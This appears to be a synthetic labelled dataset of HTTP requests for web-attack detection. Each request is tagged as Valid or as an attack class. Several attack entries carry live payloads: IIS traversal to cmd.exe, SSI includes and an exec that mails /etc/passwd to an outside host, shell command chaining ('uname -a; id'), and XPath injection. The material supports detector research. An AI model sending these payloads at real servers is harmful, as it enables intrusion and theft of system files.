Expect: 100-continue
From: Eeet7cah@Ioed.uk
If-Modified-Since: Sun, 16 Dec 07 04:46:18 CET
If-Unmodified-Since: Sat, 27 May 06 01:59:42 UTC
If-Match: *
If-None-Match: "CvOscEO0@ioPADffAxT"
If-Range: Fri, 30 Nov 07 08:31:04 GMT
Max-Forwards: 0576
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: Digest uri=/7iclmmBt/wbxhrs.wmn
Range: 966-,8322-,-48
Referer: http://ko3ntip4.gov/tarn/tfrioA/yootheko/tcsXNr.asp
TE: deflate,gzip;q=0.5,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/3.4 (compatible; Konqueror/5.0; Win98; tegotlt; wjrlgn4n)
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 128x9065
Via: 2.9 www.tsiTdi.js:9892, 6.7 135.249.80.134:52920, 6.6 www.sstrn.jpeg
Transfer-Encoding: deflate
Upgrade: tvzRch/0.9, odTegh/6.6, 6sxrte/4.3
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 60.162.169.118
X-Serial-Number: 5741877656321
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48395
Start - Id: 10672
class: Valid
GET /iv@c/run0f/qregy/ea8haAur/oNBVHebE1r.dll?FpVf=236&54iWL=lttDvR%40&t5Td4syasnrG=ohFnrtreys&vhstD7ujngUerhT=6029101378&mxr8agn=ebi&uJf=anvynaaeniytorcqs&zilbetrlApia=eelamn HTTP/1.1
Host: 161.114.141.129:90
Connection: reuesi
Accept: image/png
Accept-Charset: windows-1250;q=0.0, ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: mjha-id;q=0.4, 3cr5io-nrsDtA;q=0.7, caaLEnsm-n;q=0.7
Cache-Control: tose9al=dwn
Client-ip: 245.69.51.123
Cookie: hiiros8hsImh1ol=aocT;ea2gjMdhpinr=0469499053;XhcPeAievlustzh=e5itnisrf;siid8rS=o1le;4onwp6o=r2SR;bayxdevuseoh=adminr>tsobjectm:oeatcr$Oopasswdautoexec
Cookie2: $Version="92"
Date: Wed, 02 Jul 08 08:11:20 CET
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Thu, 16 Dec 04 10:22:34 GMT
If-Unmodified-Since: Wed, 14 Jul 04 23:23:28 GMT
If-Match: *
If-None-Match: "BwfILPO5bSU.bU80cK"
If-Range: "mUCbDId95YIkgkV"
Max-Forwards: 551
MIME-Version: 1.3
Pragma: 29iM2M=g7hmdo9
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Basic b24yaG90czphcnlqNGdObg==
Range: 9268-2780
Referer: http://l0ott.it/pc0odt/tvwYO/cwenas/g3uea/n0ieI.cfm
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: zkba (iWlx7r3; n2ujwTql; lX8NR_y.X)
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6678x842
Via: 4.6 www.nqmm.png, ca9ys/8.6 www.xwee6rsm.js, 8.1 www.dsisy.htm
Transfer-Encoding: actpyR
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10672
Start - Id: 39552
class: SSI
PUT /6X-6B2YtQ/a8zJ5bYXRV4hJ/6aneU7ohdsonBni/qv7JVscript_wget/xjeheaeboAejIeianaem/eaoaoztfabr.css? HTTP/1.1
Content-Length: 253
Content-Language: dt,enmesol,w
Content-Encoding: deflate
Content-Location: http://www.oenebaE.ch/idteiaiv/uiorgu/teasrje/tmisPa.pl
Content-MD5: ZVNCZXdzYWVjb2Zpd2c5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Mon, 04 Sep 06 01:09:27 GMT
Host: 185.53.130.148:93668
Connection: qoURhno5
Accept: audio/basic, video/mpeg;q=0.8, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: ia6-wElh;q=0.8, to-snats, ycr0ip-ascd;q=0.2, 4r-eeehtnr;q=0.8
Cache-Control: no-store
Client-ip: 3.2.131.134
Cookie: oed6nHsCSa=%doirlue>gbgsoundy;rmAhtP2eiplE5ds=t;qse
Cookie2: $Version="6"
Date: Sat, 06 Jan 07 05:02:03 UTC
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Sat, 30 Jul 05 21:35:58 UTC
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: rfejui tecolboq=iNrss8tl
Referer: /tqsc/Epuy/ladv/Yooeftet/A7hbi.msf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (Machintosh; U; PPC Mac OS X 8.2; es-nh; rv:5.2.2) Gecko/96816719
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: deflate
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~

NthuFneiraner=1&enqg0ra3fstvb=1408115&Apsvrrcneht=yDZlOYg9&5txe=<!--#include  virtual="/etc/passwd"  -->&xs1omnr=hhnlcrne&icd=9674&04Lq@=piWua&7&slerss=nlnpositionronn-&ioufr=gpi&gku9l9vsec=erpasswdt]nph-o2rmc7 az|io&h9lh9i3cnu=d

End - Id: 39552
Start - Id: 44284
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 106.116.148.180
Connection: close
Accept: video/*;q=0.2, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: cmnieCt-oofsedo
Cache-Control: max-stale=842
Client-ip: 192.246.21.91
Cookie: sPahsiysyBlsusa=riinputenIih;'l;rdEE=n2uOY;mk4n=m9B
Cookie2: $Version="75"
Date: Sat, 23 Oct 04 13:21:44 GMT
ETag: W/"Qb2QB@VsQ3Re-5VyzA"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Tue, 16 Sep 08 18:31:07 UTC
If-Match: *
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 6421
MIME-Version: 6.9
Pragma: oercr=cko5
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: neffn eeOytygd=mgot
Range: 639-682,28229-
Referer: http://www.ojzpy.ch/ernrfa.htm
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: zseDtnEtrEihniLtde
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: uhepu/7.2 231.109.39.77, FTP/3.5 www.air3ytT.tiff, 8pe/4.8 1.44.241.238
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44284
Start - Id: 28281
class: Valid
GET /75dasXrnc4rgdkhItu2e/favCIZsJ@htaccesO4mstdin.php?eguad=1465596&iXgpcotEHiheir=210664288&tstt=7&includeOMA=esmBreplacewindow.opentdmgaO%5Bi&epdmtutvhe=Hq7Qi%27%29titcyesa&osambO9eitTaynj=3h4nhrh&itarms=%7Caraqxe%2F&dTevd=-heEaofeEas&7MetfSoemf2a=0302&rareyzsbirg=3324239&eoeomKrs=+d%3Fp-gaco&elsed=mm HTTP/1.0
Host: 219.184.180.54
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-kr
Accept-Encoding: *
Accept-Language: tq-eessesh
Cache-Control: ca='lCxet'
Client-ip: 79.12.235.104
Cookie: Laa=619096;PPRtsaccept=bh;h6oiIPle=tSgMZ77gB9A;Tzln0tc8=hfZPZaIA
Cookie2: $Version="767"
Date: Thu, 30 Mar 06 08:41:00 GMT
ETag: "NE29suwvLX-zC.m1Xx"
Expect: 100-continue
From: fsja@jaPayf.de
If-Modified-Since: Sun, 30 Sep 07 13:18:07 CET
If-Unmodified-Since: Sun, 09 Jan 05 04:19:31 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Mar 07 08:13:05 GMT
Max-Forwards: 1096
MIME-Version: 4.5
Pragma: s='t'
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Digest response="70bE6AD2112a6eB52ABF7AD6bcD55eC0"
Range: 3-15771,8-
Referer: http://teobe.biz/mn1Eiu4/wwWvbe.doc
TE: trailers,trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: edeRxa7io (n0qnJVfVkj; 9MeHO7@p30)
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 891x280
Via: 7.7 30.43.196.60, FTP/7.1 198.218.36.37:58, 4.3 192.251.48.81:1308
Transfer-Encoding: antcs
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28281
Start - Id: 49041
class: XPathInjection
GET /uSieqi/9gZNPWE3EXXiSU@SZ_.pl?zS3ml=tr&sluhaer0hnce=n%27iMmsDNeuA&e9owosnnonlr=9898367&f6ttN06o=tfrpL%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27hwe5si0l%27+%3D++++%27&oOenru7un5iien=915&geodhahnip=eitI&apmhIws=lR8d-%3Cdoetml&ento0sro2Tr=nAs%26eSs3ct+nw&nrdaeqgnn=l%29eieb&hPwWakZWatG=systemdos+tnhqe&mitbee0nhein5=SbyiqLnOAy&jiIkrhOllet5=i-XtbpHCEN&mrratnmawv=%24s0arhomePte%5Crcpl HTTP/1.1
Host: 114.146.57.226
Connection: thoesTla
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate
Accept-Language: qntrxteI-eosng, usu7-faMqaate;q=0.2, dEe4er3E-a, g-di, 3-i5eaept
Cache-Control: no-cache
Client-ip: 53.172.25.114
Cookie: imgOmz=tcopyokaeit2
Cookie2: $Version="182"
Date: Thu, 18 Jan 07 19:33:29 CET
ETag: W/"RWRewLZE@ByZlVH@yVU"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: omlrams@dneneIeea.de
If-Modified-Since: Sun, 25 Oct 09 07:43:06 GMT
If-Unmodified-Since: Mon, 02 May 05 22:09:14 UTC
If-Match: "Z5kmRYYA.PhkSJOmj"
If-None-Match: *
If-Range: Fri, 08 Apr 05 14:49:48 GMT
Max-Forwards: 3
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://www.LretrD.de/g8sitlr.nsf
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: tergni5Wp/7.8
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: tird; sacha=mnhot
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 688 135.98.248.226 "d8an8" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49041
Start - Id: 43151
class: OsCommanding
GET /hYriN/yiZ/rWSR7X/svLgzZ@0uL0/ia/a9CdbxJUcnJ/atiLmeesVahtictehwv/te/aZ1nPGV45X86hLlDCC/ngesmml7f/MrrugiadhoetOars6e4/A7igesqeeezn.shtml?swex=+++++%3B+echo+++++%3B+++++w+%3Buname++++-a+%3B++++id HTTP/1.0
Host: www.3rarxxta.it
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="03"
Date: Sun, 23 Mar 08 09:28:23 UTC
ETag: "8Si792-o4C3zcdKh6"
Expect: 100-continue
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 02 Apr 06 20:17:45 CET
If-Match: "GmHZ7LOn_@aij39g"
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 64
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbndtb250NGE5ZHRscnhuYTI2ZGRyMlNjc2x0cmhGTg==
Authorization: Basic MlVzaGhyOmJyZWlp
Range: 46359-,93372-15,76-
Referer: http://aeae.uk/fbHn4e.mspx
TE: trailers,chunked;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 9.2; rs-as; rv:8.8.4) Gecko/28955554
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: HTTP/8.5 149.159.34.115
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43151
Start - Id: 11282
class: Valid
GET /e5Lyr5thtyEi/jdDl9MRR5ibGP7n12L5/astrchan/bEtm/ttam/iT1Z@_7q_/nmvucPGuSh5pO9vDZ@.msf?tst9y1stEr=hmwm&HpositionyP.D1WadminI0Q=tohtkhaeemoAI&absatMnrerfVhls=82276565&satse1suhecooct=864865&UCwEw=582&o6e=%2BdPx%5Diid&Emmeatn=60409050&aaweyitbeaeem2e=akzdb8&rihae20x=f+atnbE%40uaeintXehtacceslo%3A&nojaadanmfur0=oablobinnlmlacceptdcoYtb&wsdgWoieeteru=EOae&s8eEtine=7&1s0ePp=9ia HTTP/1.1
Host: www.lruewTmuG.be
Connection: ontova3s
Accept: image/gif;q=0.6, audio/*, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: di-9lgj
Cache-Control: no-cache
Client-ip: 43.28.8.140
Cookie: eseihzotiu=eS6q9jN;fo=euuh5
Cookie2: $Version="30"
Date: Tue, 14 Mar 06 06:22:29 CET
ETag: W/"i3D@tv.QMOZhRlbwwT"
Expect: 100-continue
From: 7urSh@tin1aU.biz
If-Modified-Since: Mon, 10 Nov 08 18:24:47 CET
If-Unmodified-Since: Sun, 01 Jun 08 20:42:55 GMT
If-Match: *
If-None-Match: *
If-Range: "ACjazMr56rQdmQ7N0"
Max-Forwards: 01
MIME-Version: 8.1
Pragma: rhRlr=ep
Proxy-Authorization: Digest nc=3c06C92E
Authorization: Digest uri=http://77waO.be/ntlia0n/pwn3dh.dll
Range: 561715-83
Referer: http://www.osey3o.gov/4ssb9ei/hnIs/Qreh6oe.php3
TE: gzip
Trailer: Accept-Encoding
User-Agent: aurepcoees (ld3yAS; rnCGuG; shaW6CuUl)
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4159x0330
Via: 7.4 131.28.96.229
Transfer-Encoding: deflate
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 802 www.wgr3.htm "hj5a7aEzetiifaepobs" "Mon, 21 Jan 08 07:41:19 UTC"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11282
Start - Id: 18306
class: Valid
GET /ae/ipalekre8mtfIevw/eforN81OKE8HcrQKj/eEEn6XTVvf8PcCF@Jo_A/Di6FDRFBsHq3X/nawnoygot6rhelgexloi/r@DiwCVSnZU7FtE/t0qrl-p5h-PQGI/M4Z@7QuniontH/S1kCIrttSjacceptK/nieitHtH/QOEk0a6n.tiff?ac=oza&Cobject9my_L=11&KlsDgadmin1selecte0=-k&aO79uclAwmRrb=6664&mitdhfntl=na HTTP/1.0
Host: www.vydncrwe5.it:6
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.8, utf-7;q=0.4, cp-936;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 34.186.224.238
Cookie: ev1ms=74;ebT8fOFS=lS.hKb;dwoneeEsl=33;utrb7hNwndsecl=tihothtrtupanlbu;fsdaewtnaNTg9tN=sl&yrydl
Cookie2: $Version="2"
Date: Fri, 02 Oct 09 08:06:00 UTC
ETag: "fKZ8peuxgdq_2ugbR"
Expect: k1afzT=s2Dfi;iaaotytr=tXsszr7
From: gstN@lnddoWhdmn.fr
If-Modified-Since: Sat, 27 Sep 08 21:17:35 CET
If-Unmodified-Since: Wed, 17 Sep 08 10:29:48 UTC
If-Match: "CdSYgpzipblqve2SA"
If-None-Match: *
If-Range: Fri, 11 Apr 08 12:57:45 UTC
Max-Forwards: 03
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: NTLM b21paTFhbmZzaUdBeDI3dWlybmZjcnNkbm5uN3VsdDQ=
Range: 33-392,-2077,7-8592
Referer: http://qotl.net/wsxueI/ohe6Vhe/0rmeniri/61auos.css
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 8.0; 4b-hm; rv:5.2.6) Gecko/82226356
UA-CPU: PowerPC
UA-Disp: 644,336,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: deflate
Upgrade: aeft/2.6, oxx/2.6
Warning: 514 67.147.194.108 "eiekiaraEa6" "Fri, 07 Oct 05 14:36:56 GMT"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18306
Start - Id: 9904
class: Valid
GET /lD5JTsV/ayNhyjehehp3taseS8/a1xqnmit2not/atfly/gHM6vDaU/aKkncCmV1FsBG-2Ee/xYr_UlBbodyLV@.html?ul5=7&esnbEAi=roe%5Dee+tfx&t9r5decasizi=fj&datY=mtstylekU&ihP=1012822 HTTP/1.1
Host: www.iea9aaefw.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-greek, iso-8859-6
Accept-Encoding: identity;q=0.5, identity, compress, identity;q=0.7, gzip;q=0.1
Accept-Language: niu-aa, Atrps-7tmmadth;q=0.6
Cache-Control: max-stale
Client-ip: 79.46.22.252
Cookie: e0rsRehdtiuhon=87802859;srwerHueathwr=7andcmdtete;jUrb=1htpassxn ofee|Rhspa;udi=erk?w;rnph-B53qCwlY=upec5trrhedtaeb3
Cookie2: $Version="2"
Date: Thu, 06 May 10 01:19:15 GMT
ETag: "W1YghaQsoItNO1M"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Tue, 28 Feb 06 11:17:21 UTC
If-Unmodified-Since: Sat, 01 Apr 06 16:01:34 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 5.5
Pragma: n0iE='623orfkn'
Proxy-Authorization: Digest realm
Authorization: Basic a3RlaUVnZTppZWVydGE=
Range: 3507-
Referer: http://oWjefan.st/ipw6uira/eieesat/dIer/7tve/aOqd8w.txt
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: xrHitejiiah6Aa
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 475x606
Via: FTP/7.6 www.ztdE.jpg, 6.8 129.152.215.11
Transfer-Encoding: deflate
Upgrade: lshhnT/1.9, eeb/3.9, Ia5/6.6, ttme/7.7
Warning: 983 www.cr4egnne.tiff "nyefhAeast3" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 002205670560863085
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9904
Start - Id: 40070
class: SSI
GET /wO5vCSrTd/sboqjY669UjxA2/inottQsstEdtc.jpeg?gHnao=f%3BLir+okgEiinsertlleam%28&pOrroedab6=+%3Dsne&o6sea=oeqlieelaryoM0am&3rueptmWct=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++ieOOl.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&x3=cUfPa HTTP/1.0
Host: www.luoa12scg.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: emiein-Mxlequ;q=0.4, 8-Sc7s1z;q=0.1, h-smwb
Cache-Control: max-stale
Client-ip: 53.190.46.19
Cookie: 0woooaatga=ntNemtAkti)re]htaccesulin;naqeOmh1ghs=ik?hlocationc:insertnctnEtaad$$
Cookie2: $Version="530"
Date: Sat, 28 May 05 21:43:50 UTC
ETag: W/"sqokejaIeojg8ZyiB"
Expect: 100-continue
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sat, 16 Apr 05 22:03:11 CET
If-Match: "dCPZlbmt35Dk6528@a"
If-None-Match: "lbTqAHvuE1Uv8WX7LgLZ"
If-Range: Sun, 12 Sep 04 16:59:36 UTC
Max-Forwards: 972
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM YXRlVGVKcnVvNG9SMHJubXloTG1hZEFuZ3RkeWFEZUdldGRlZm0xOG41bW1yb2Ns
Authorization: Digest uri=http://www.atrBt.uk/llTg/lmty/srosiRhd/mteu/4rRzRrnd.swf
Range: -34,965-6
Referer: http://www.uEAl.net/no1et/1Jo0s/eniaueb/ttrn/tbosd.php
TE: deflate;q=0.2
Trailer: Via
User-Agent: caeeNrtsiymo
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 583461727147573660
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40070
Start - Id: 697
class: Valid
GET /ms/dfKaccess_log/o5ZlLS8EZzBCYF-UoTD/strtdy/oa4/c1QYB-IrFa/vEq2Kd4https.sh?jzjR5wget6Ds=openo&ebcn0nlxsete=851555&hpmda5rwbIE8=rF0&sbeIlein=mkeharnrln8df&43XzRMV0formsM0=678&shgp=5178049&nreNdhunidAr8a=ieoy&jtsenntkaei7=6oAcearuese&d7xt5v85=54 HTTP/1.0
Host: www.frnuoj.cz:6
Connection: ddtaiLd
Accept: video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 60.58.240.147
Cookie: connectLn3hNXP=nJhWmT4sLhcK
Cookie2: $Version="46"
Date: Fri, 16 Jan 04 04:58:32 CET
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Sat, 10 Jan 04 22:11:01 GMT
If-Unmodified-Since: Mon, 18 Feb 08 10:59:09 UTC
If-Match: "6qzZ.Iq3IV4cYsm"
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 2954
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="hihtp"
Authorization: Digest qop=auth
Range: -508,-924
Referer: /aokr14qb/iahbde/8e4shy.swf
TE: trailers
Trailer: From
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 0.2; od-lt; rv:5.2.8) Gecko/37001229
UA-CPU: x86
UA-Disp: 047,845,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: 0.5 223.175.176.167, 4.0 33.253.175.209, 0.9 66.239.169.254
Transfer-Encoding: deflate
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 194 84.41.126.122 "mdoaa2i1" "Thu, 12 May 05 04:17:10 CET"
X-Forwarded-For: 26.52.16.97
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 697
Start - Id: 36631
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 163.176.239.92
Connection: mecs
Accept-Charset: x-mac-hebrew
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 159.33.177.101
Cookie: ileDrge=os 
Date: Tue, 14 Oct 08 20:44:01 UTC
If-None-Match: "Ufdhr.dMyM-8_Be"
If-Range: "caCB-l7@grGU9GjjQfU"
Max-Forwards: 254
Authorization: NTLM cmNlcGdhbnd0b29yM25lYWlvZWVFYWQyYXJtWXNlbkRhbXJqaDRsaWV3
Referer: /iodAg1if/wep4.exe
User-Agent: nemmdnndciaeog
X-Forwarded-For: 175.54.107.115

null

End - Id: 36631
Start - Id: 19355
class: Valid
GET /lirwreb/T7kahdycrtild/2cpE/SOk4N.gLybIM-5/nepT_Ltk41g__-/m6P2DcJ0tVyos/hAuIplQji6m/dlLSeeokH/tgeXjNH1ughx/deseSrn/nterco3uteVsOl/httpIbF1D.cgi?yf2ou=ei6gcmdw&beer37ts9=esppzoco1jp&WVF9var3l=nfud6i8t&ntteza=winntrlebOn&vufe=265&73itenibr=Abingda8ve&fwtteoa=673385&CexecN37r=2871264&keee1q2=32&5jtghlrwh5el=0 HTTP/1.0
Host: www.mopeit1jo.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-7;q=0.0, euc-tw;q=0.7, x-mac-roman;q=0.8
Accept-Encoding: 
Accept-Language: eiOasA-ukh;q=0.0, A-ocdUis;q=0.5
Cache-Control: no-store
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Thu, 14 Oct 04 06:36:30 UTC
ETag: W/"7Sx2WhrqLQQ@nr1t"
Expect: Rama
From: eNaay@rjRtebre.biz
If-Modified-Since: Wed, 04 Nov 09 11:01:27 CET
If-Unmodified-Since: Fri, 29 Dec 06 21:31:32 UTC
If-Match: "3-ConxN4nJMhZoW"
If-None-Match: *
If-Range: "OvYwWwz1zhlsfLWEU8TU"
Max-Forwards: 264
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bmZydGM6ZGVlYQ==
Authorization: NTLM aWRxNFZvbHJuc2F1MmJlc2VlaHRlN2RpdGVldXdDcmVhbm9lbA==
Range: 80-
Referer: /tnieZH/Lonrp.rar
TE: trailers
Trailer: If-Match
User-Agent: 1flWkqed (nLW5sKLyT; 49W2vDXS)
UA-CPU: StrongARM
UA-Disp: 674,7588,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: FTP/0.6 66.43.140.206, HTTP/0.2 www.ae3cwzhc.png:7, 1.6 109.79.2.220
Transfer-Encoding: 4zrena; ueedpe=54dtr
Upgrade: ma71z/4.6, eysee/5.2
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19355
Start - Id: 12769
class: Valid
GET /yvgxOh_iq2f0Pu.lfpXR/snatrte/r9KhxoHAI/ijn/mMxHWUYwa_8/tsjEileltste/okY/sssaaSialtpact6Nlnen.aspx? HTTP/1.1
Host: 126.242.83.243
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, deflate;q=0.2, deflate, deflate;q=0.0, compress
